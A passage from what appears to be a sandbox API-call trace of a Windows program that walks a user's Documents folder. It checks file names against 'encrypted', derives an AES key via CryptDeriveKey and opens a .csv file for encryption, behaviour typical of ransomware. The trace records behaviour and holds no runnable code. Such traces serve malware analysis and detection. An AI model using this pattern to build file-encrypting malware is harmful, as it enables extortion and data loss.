cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4N5-.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.385] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.385] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0036.385] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.385] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.386] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.386] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.386] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.386] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.386] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.386] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.386] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447c1820, ftCreationTime.dwHighDateTime=0x1d5bfca, ftLastAccessTime.dwLowDateTime=0x8ed2db60, ftLastAccessTime.dwHighDateTime=0x1d5c19c, ftLastWriteTime.dwLowDateTime=0x8ed2db60, ftLastWriteTime.dwHighDateTime=0x1d5c19c, nFileSizeHigh=0x0, nFileSizeLow=0x1c01, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="PM4N5-.csv", cAlternateFileName="")) returned 0x7c2240 [0036.387] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.387] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.387] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.387] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.387] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.387] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.387] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.387] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0036.387] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.387] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.387] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0036.387] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.387] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.387] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.387] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.387] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.388] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0036.388] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.388] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0036.389] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.389] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.389] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0036.389] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.389] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.389] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.389] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.389] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.389] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.389] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.389] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.390] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.390] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0036.390] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.390] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.390] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.390] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.390] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.390] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.390] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.390] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.390] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.390] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.390] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.390] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.390] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.390] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.390] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.390] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.391] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.391] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.391] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.391] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0036.391] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.391] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.391] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.391] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.391] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0036.391] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.391] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.391] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.391] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.391] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.391] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0036.391] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.391] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.391] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.391] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.392] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.392] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.392] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.392] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.392] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0036.392] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.392] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.392] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.392] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.392] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.392] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0036.392] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.392] CryptDestroyHash (hHash=0x7c2100) returned 1 [0036.392] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.392] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.392] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.392] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.392] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\pm4n5-.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.393] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.393] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0036.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0036.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0036.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0036.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.393] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0036.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0036.393] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0036.393] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0036.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0036.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0036.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0036.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0036.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0036.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0036.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0036.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0036.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: 